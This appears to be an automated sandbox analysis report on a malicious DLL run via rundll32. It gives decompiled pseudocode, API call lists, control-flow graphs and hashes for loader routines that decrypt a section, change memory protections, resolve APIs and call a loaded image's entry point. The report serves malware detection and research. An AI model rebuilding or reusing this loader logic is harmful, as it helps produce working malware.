                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                    • String ID:
                    • API String ID: 3832013932-0
                    • Opcode ID: e8c56b45973bfc823bfca848450333328b84f1469fab449ce72a43468427b6da
                    • Instruction ID: 4b339dd1501ca466043efe3476dac1292b6b113e6c52c4baebf0a4a85d3d665e
                    • Opcode Fuzzy Hash: e8c56b45973bfc823bfca848450333328b84f1469fab449ce72a43468427b6da
                    • Instruction Fuzzy Hash: 00F08232114A20FBCB125FA08C0DF4FBF68FF0A736F018404F61591264D72398349BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFEB990 Relevance: 8.8, APIs: 2, Strings: 2, Instructions: 1789sleepCOMMON
                    Download Yara Rule
                    APIs
                    • GetEnvironmentVariableW.KERNEL32(70037558,?,0000060C), ref: 6FFECD5C
                    • Sleep.KERNELBASE(00000010), ref: 6FFECE46
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: EnvironmentSleepVariable
                    • String ID: .$3
                    • API String ID: 1164960984-2208969288
                    • Opcode ID: 5f6dbbf57cb9b56e344d09c040573a26ca5c195e47ee713072fcb6e962a7a218
                    • Instruction ID: bd11c32b1ae336e47c876e3b1425ae6335d58de122f330f4c70983161a0f2bd7
                    • Opcode Fuzzy Hash: 5f6dbbf57cb9b56e344d09c040573a26ca5c195e47ee713072fcb6e962a7a218
                    • Instruction Fuzzy Hash: 3D1372325071A0CEE319CF2ACB587743BB2BB47325F2445EAF54D8A7A6D6384584CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA1B8C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 362 6ffa1b8c-6ffa1bad call 6ffa1fe8 365 6ffa1ca8-6ffa1cad 362->365 366 6ffa1bb3-6ffa1bed VirtualAlloc 362->366 367 6ffa1bf3-6ffa1bf9 366->367 368 6ffa1ca0 366->368 370 6ffa1bfb-6ffa1c11 367->370 371 6ffa1c68 367->371 369 6ffa1ca7 368->369 369->365 372 6ffa1c16-6ffa1c63 call 6ffa19d9 370->372 373 6ffa1c6d-6ffa1c72 371->373 379 6ffa1c13 372->379 380 6ffa1c65-6ffa1c66 372->380 375 6ffa1c87 373->375 376 6ffa1c74-6ffa1c85 memcpy 373->376 378 6ffa1c8e-6ffa1c9e VirtualFree 375->378 376->378 378->369 379->372 380->373
                    C-Code - Quality: 86%
                    			E6FFA1B8C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x6ffa41b0;
				_t46 = E6FFA1FE8(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x6ffa41cc;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x6ffa5137; // 0x6ffa5137
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E6FFA19D9(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x6ffa41cc = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}






















                    0x6ffa1b93
                    0x6ffa1ba3
                    0x6ffa1baa
                    0x6ffa1bad
                    0x6ffa1bc2
                    0x6ffa1bc9
                    0x6ffa1bce
                    0x6ffa1bdf
                    0x6ffa1be2
                    0x6ffa1bea
                    0x6ffa1bed
                    0x6ffa1ca0
                    0x6ffa1bf3
                    0x6ffa1bf3
                    0x6ffa1bf9
                    0x6ffa1c68
                    0x6ffa1bfb
                    0x6ffa1bfb
                    0x6ffa1bfe
                    0x6ffa1c00
                    0x6ffa1c08
                    0x6ffa1c0b
                    0x6ffa1c0e
                    0x6ffa1c16
                    0x6ffa1c21
                    0x6ffa1c22
                    0x6ffa1c23
                    0x6ffa1c40
                    0x6ffa1c4e
                    0x6ffa1c55
                    0x6ffa1c58
                    0x6ffa1c5e
                    0x6ffa1c63
                    0x00000000
                    0x00000000
                    0x6ffa1c13
                    0x6ffa1c13
                    0x6ffa1c65
                    0x6ffa1c72
                    0x6ffa1c87
                    0x6ffa1c74
                    0x6ffa1c7d
                    0x6ffa1c82
                    0x6ffa1c98
                    0x6ffa1c98
                    0x6ffa1ca7
                    0x6ffa1cad

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,6FFA1552,00003000,00000004,?,?,6FFA1552,00000001), ref: 6FFA1BE2
                    • memcpy.NTDLL(?,?,6FFA1552,?,?,6FFA1552,00000001), ref: 6FFA1C7D
                    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6FFA1552,00000001), ref: 6FFA1C98
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: Virtual$AllocFreememcpy
                    • String ID: Aug 10 2021
                    • API String ID: 4010158826-2753409178
                    • Opcode ID: 574fd3ea9c40cb38af4f302b76da47fadb6a1d91adb01e6a26f2f794c8b94783
                    • Instruction ID: 1976acf047ca763e131782b778e3a7cb274a29a87fc56840b7191bf7f5255c01
                    • Opcode Fuzzy Hash: 574fd3ea9c40cb38af4f302b76da47fadb6a1d91adb01e6a26f2f794c8b94783
                    • Instruction Fuzzy Hash: BA311D71E10219EFDB01CFA8C981BEEB7B5BF09314F214159E915BB280D772AA15CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA149B Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 87%
                    			E6FFA149B(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6FFA14FE(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                    0x6ffa14a4
                    0x6ffa14a9
                    0x6ffa14b7
                    0x6ffa14bc
                    0x6ffa14bc
                    0x6ffa14c2
                    0x6ffa14c7
                    0x6ffa14cb
                    0x6ffa14cf
                    0x6ffa14cf
                    0x6ffa14d9
                    0x6ffa14e2

                    APIs
                    • GetCurrentThread.KERNEL32 ref: 6FFA149E
                    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6FFA14A9
                    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6FFA14BC
                    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6FFA14CF
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: Thread$Priority$AffinityCurrentMask
                    • String ID:
                    • API String ID: 1452675757-0
                    • Opcode ID: 05322f4f0a067e79b7eb53289ff32df04a40c2ca5a2108a9cc9d3251cb6883a2
                    • Instruction ID: ac55d6330227ba279be554e551bebd22c16f7ecf3d7724850b5f75d80786fe4c
                    • Opcode Fuzzy Hash: 05322f4f0a067e79b7eb53289ff32df04a40c2ca5a2108a9cc9d3251cb6883a2
                    • Instruction Fuzzy Hash: 31E06D31315A14ABD6126B2D4C85F6F765CEF836357038225F920D22E0CB56982189A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA2042 Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 398 6ffa2042-6ffa2085 VirtualProtect 399 6ffa211a-6ffa2121 398->399 400 6ffa208b-6ffa208f 398->400 400->399 401 6ffa2095-6ffa209f 400->401 402 6ffa20bd-6ffa20c7 401->402 403 6ffa20a1-6ffa20ab 401->403 404 6ffa20db 402->404 405 6ffa20c9-6ffa20d9 402->405 406 6ffa20ad-6ffa20b3 403->406 407 6ffa20b5-6ffa20bb 403->407 408 6ffa20e1-6ffa20f4 VirtualProtect 404->408 405->404 405->408 406->408 407->408 409 6ffa20ff-6ffa2114 408->409 410 6ffa20f6-6ffa20fc GetLastError 408->410 409->399 409->400 410->409
                    C-Code - Quality: 87%
                    			E6FFA2042(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6ffa41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                    0x6ffa204c
                    0x6ffa2059
                    0x6ffa205f
                    0x6ffa206b
                    0x6ffa207b
                    0x6ffa207d
                    0x6ffa2085
                    0x6ffa211a
                    0x6ffa2121
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa208b
                    0x6ffa208b
                    0x6ffa208b
                    0x6ffa208f
                    0x00000000
                    0x00000000
                    0x6ffa209b
                    0x6ffa209f
                    0x6ffa20c3
                    0x6ffa20c7
                    0x6ffa20db
                    0x6ffa20db
                    0x6ffa20e1
                    0x6ffa20f0
                    0x6ffa20f4
                    0x6ffa20fc
                    0x6ffa20fc
                    0x6ffa2104
                    0x6ffa2107
                    0x6ffa2114
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa2114
                    0x6ffa20cf
                    0x6ffa20d3
                    0x6ffa20d9
                    0x00000000
                    0x00000000
                    0x00000000
                    0x6ffa20d9
                    0x6ffa20a7
                    0x6ffa20ab
                    0x6ffa20b5
                    0x6ffa20ad
                    0x6ffa20ad
                    0x6ffa20ad
                    0x00000000
                    0x6ffa20ab
                    0x00000000

                    APIs
                    • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6FFA207B
                    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6FFA20F0
                    • GetLastError.KERNEL32 ref: 6FFA20F6
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual$ErrorLast
                    • String ID:
                    • API String ID: 1469625949-0
                    • Opcode ID: cfb6d2c5ebd4110e1791511e648b1784f8327aba92cdb55bfcbf45d98cf7793c
                    • Instruction ID: e681f4ef843ec588cb0172eda39a4f5eba049f1e30e0cbedc153c2b3ccb6c813
                    • Opcode Fuzzy Hash: cfb6d2c5ebd4110e1791511e648b1784f8327aba92cdb55bfcbf45d98cf7793c
                    • Instruction Fuzzy Hash: 2F217F71A0020ADFCB14CF96C985AAAF7B4FF08354F018459D602D7119E7B6FAB4CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA1768 Relevance: 4.6, APIs: 3, Instructions: 60stringthreadCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 80%
                    			E6FFA1768() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6ffa41c4);
				_push(1);
				_push( *0x6ffa41d0 + 0x6ffa5089);
				 *0x6ffa41c0 = 0xc;
				 *0x6ffa41c8 = 0; // executed
				L6FFA1B44(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6FFA1823( &_v44,  &_v28,  *0x6ffa41cc ^ 0xf7a71548) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6ffa41b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6FFA10ED(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6ffa41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6FFA212A(_t40, _t30 + 4);
					}
				}
				_t23 = E6FFA1202(_v44); // executed
				goto L7;
			}













                    0x6ffa177a
                    0x6ffa177b
                    0x6ffa1780
                    0x6ffa1788
                    0x6ffa1789
                    0x6ffa1793
                    0x6ffa1799
                    0x6ffa17a2
                    0x6ffa17a7
                    0x6ffa17c5
                    0x6ffa181a
                    0x6ffa181b
                    0x6ffa181c
                    0x6ffa181c
                    0x6ffa17cd
                    0x6ffa17d3
                    0x6ffa17e1
                    0x6ffa17e5
                    0x6ffa17ec
                    0x6ffa17f4
                    0x6ffa17f8
                    0x6ffa17fa
                    0x6ffa1809
                    0x6ffa17fc
                    0x6ffa1802
                    0x6ffa1802
                    0x6ffa17fa
                    0x6ffa1811
                    0x00000000

                    APIs
                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6FFA41C4,00000000), ref: 6FFA1799
                    • lstrlenW.KERNEL32(?,?,?), ref: 6FFA17CD
                      • Part of subcall function 6FFA10ED: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?,?), ref: 6FFA10FA
                      • Part of subcall function 6FFA10ED: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6FFA1110
                      • Part of subcall function 6FFA10ED: _snwprintf.NTDLL ref: 6FFA1135
                      • Part of subcall function 6FFA10ED: CreateFileMappingW.KERNELBASE(000000FF,6FFA41C0,00000004,00000000,?,?), ref: 6FFA115A
                      • Part of subcall function 6FFA10ED: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A,?), ref: 6FFA1171
                      • Part of subcall function 6FFA10ED: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6FFA17EA,0000000A), ref: 6FFA11A6
                    • ExitThread.KERNEL32 ref: 6FFA181C
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                    • String ID:
                    • API String ID: 4209869662-0
                    • Opcode ID: 40c273f6cccbe6e4c30b4ad415961502ae60054672a3cc50f47e407a24610408
                    • Instruction ID: ba2e23155f3044b941b6722e076eb26e23888a85ab95edd2a1b30d38a75a6203
                    • Opcode Fuzzy Hash: 40c273f6cccbe6e4c30b4ad415961502ae60054672a3cc50f47e407a24610408
                    • Instruction Fuzzy Hash: B2119D72114705EBDB02CBA4C844E8B77ECFF45718F024A16F514D71B0EB32E5258B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA195C Relevance: 2.5, APIs: 2, Instructions: 48memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 455 6ffa195c-6ffa197f call 6ffa1823 458 6ffa19d3-6ffa19d8 455->458 459 6ffa1981-6ffa1984 455->459 460 6ffa199d 459->460 461 6ffa1986-6ffa199b call 6ffa1ce6 459->461 462 6ffa199f-6ffa19a1 460->462 461->462 465 6ffa19c2-6ffa19cd HeapFree 462->465 466 6ffa19a3-6ffa19bb call 6ffa11bf StrStrIA 462->466 465->458 466->465 469 6ffa19bd 466->469 469->465
                    C-Code - Quality: 83%
                    			E6FFA195C(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6FFA1823( &_v8,  &_v12,  *0x6ffa41cc ^ 0x13b675ce) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6FFA1CE6(_t22, _v8,  *0x6ffa41cc ^ 0x64927f78);
					}
					if(_t29 != 0) {
						_v12 = E6FFA11BF(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6ffa4190, 0, _v8);
				}
				return _t25;
			}








                    0x6ffa195c
                    0x6ffa195f
                    0x6ffa1960
                    0x6ffa1976
                    0x6ffa197f
                    0x6ffa1984
                    0x6ffa199d
                    0x6ffa1986
                    0x6ffa1999
                    0x6ffa1999
                    0x6ffa19a1
                    0x6ffa19ab
                    0x6ffa19b3
                    0x6ffa19bb
                    0x6ffa19bd
                    0x6ffa19bd
                    0x6ffa19bb
                    0x6ffa19cd
                    0x6ffa19cd
                    0x6ffa19d8

                    APIs
                    • StrStrIA.KERNELBASE(00000000,6FFA1576,?,6FFA1576,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA19B3
                    • HeapFree.KERNEL32(00000000,?,?,6FFA1576,?,00000000,00000001,?,?,?,6FFA1576), ref: 6FFA19CD
                    Memory Dump Source
                    • Source File: 00000017.00000002.882437220.000000006FFA1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFA0000, based on PE: true
                    • Associated: 00000017.00000002.882429861.000000006FFA0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882445989.000000006FFA3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882458284.000000006FFA5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                    • Associated: 00000017.00000002.882465797.000000006FFA6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffa0000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: 0cc056e2f427b0f07676d74c4b0a1950607073afe7587e5dd3d5b5b582255024
                    • Instruction ID: ebecf059f9f4a8fbc4aed600558ceb286cbac88e68404b638a45fc0752f40090
                    • Opcode Fuzzy Hash: 0cc056e2f427b0f07676d74c4b0a1950607073afe7587e5dd3d5b5b582255024
                    • Instruction Fuzzy Hash: 6601A776A10514FBCB02DFE1CD41EEF7BBDEF49614F110162A940E7150EA32DA11CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70012BAD Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 470 70012bad-70012bba call 70007341 472 70012bbf-70012bca 470->472 473 70012bd0-70012bd8 472->473 474 70012bcc-70012bce 472->474 475 70012c1b-70012c27 call 700074e6 473->475 476 70012bda-70012bde 473->476 474->475 477 70012be0-70012c15 call 70009e84 476->477 482 70012c17-70012c1a 477->482 482->475
                    APIs
                      • Part of subcall function 70007341: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 70007382
                    • _free.LIBCMT ref: 70012C1C
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: fead79109f577deddf8a53b2cc60840e495838c99c5678c3529969ae27bebc1b
                    • Instruction ID: 01e20f841c9e04464adfce6f7e35b71ec3d9e2d41086ca7dfdcb3ea9ab1f951f
                    • Opcode Fuzzy Hash: fead79109f577deddf8a53b2cc60840e495838c99c5678c3529969ae27bebc1b
                    • Instruction Fuzzy Hash: D0012672604356AFD321CFA8C88598EFBA9EB047B0F110629E545A76C0E7706C60CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 70007341 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 483 70007341-7000734c 484 7000735a-70007360 483->484 485 7000734e-70007358 483->485 487 70007362-70007363 484->487 488 70007379-7000738a RtlAllocateHeap 484->488 485->484 486 7000738e-70007399 call 70006ddb 485->486 492 7000739b-7000739d 486->492 487->488 489 70007365-7000736c call 7000a696 488->489 490 7000738c 488->490 489->486 496 7000736e-70007377 call 70007d94 489->496 490->492 496->486 496->488
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 70007382
                    Memory Dump Source
                    • Source File: 00000017.00000002.882489072.000000006FFAF000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6FFAF000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_6ffaf000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 83ae4360da9de4c45a5372c3d4d21f61860616477a54fd77e35a3774930ba702
                    • Instruction ID: f4c1256cff3dfffd2646add9926f72ff9ef73e0d1a68f64f008ebb8cd14b0c2c
                    • Opcode Fuzzy Hash: 83ae4360da9de4c45a5372c3d4d21f61860616477a54fd77e35a3774930ba702
                    • Instruction Fuzzy Hash: 7AF0BB32E447286AF721DA268D0DB7E37AAAF41E70B258115FC0ED6144CB78ED00A6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 6FFA1202 Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                    Download Yara Rule
                    C-Code - Quality: 86%
                    			E6FFA1202(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6ffa41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ffa41cc - 0x69b24f45 &  !( *0x6ffa41cc - 0x69b24f45);
				_t18 = E6FFA1E91( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ffa41cc - 0x69b24f45 &  !( *0x6ffa41cc - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6ffa41cc - 0x69b24f45 &  !( *0x6ffa41cc - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6FFA16E7(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6FFA1A0A(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6FFA2042(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6FFA1E7C(_t42);
					L8:
					return _t29;
				}
			}














                    0x6ffa120a
                    0x6ffa120c
                    0x6ffa1228
                    0x6ffa1239
                    0x6ffa1240
                    0x6ffa129e
                    0x00000000
                    0x6ffa1242
                    0x6ffa1242
                    0x6ffa124c
                    0x6ffa1250
                    0x6ffa1255
                    0x6ffa1258
                    0x6ffa125d
                    0x6ffa1261
                    0x6ffa1266
                    0x6ffa126b
                    0x6ffa126f
                    0x6ffa1274
                    0x6ffa1275
                    0x6ffa1279
                    0x6ffa127e
                    0x6ffa1286
                    0x6ffa1286
                    0x6ffa127e
                    0x6ffa126f
                    0x6ffa1261
                    0x6ffa1288
                    0x6ffa1291
                    0x6ffa1295
                    0x6ffa129f
                    0x6ffa12a5
                    0x6ffa12a5

                    APIs
                      • Part of subcall function 6FFA1E91: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6FFA123E,?,?,?,?,00000002,00000000,?,?), ref: 6FFA1EB5
                      • Part of subcall function 6FFA1E91: GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1ED7
                      • Part of subcall function 6FFA1E91: GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1EED
                      • Part of subcall function 6FFA1E91: GetProcAddress.KERNEL32(00000000,?), ref: 6FFA1F03
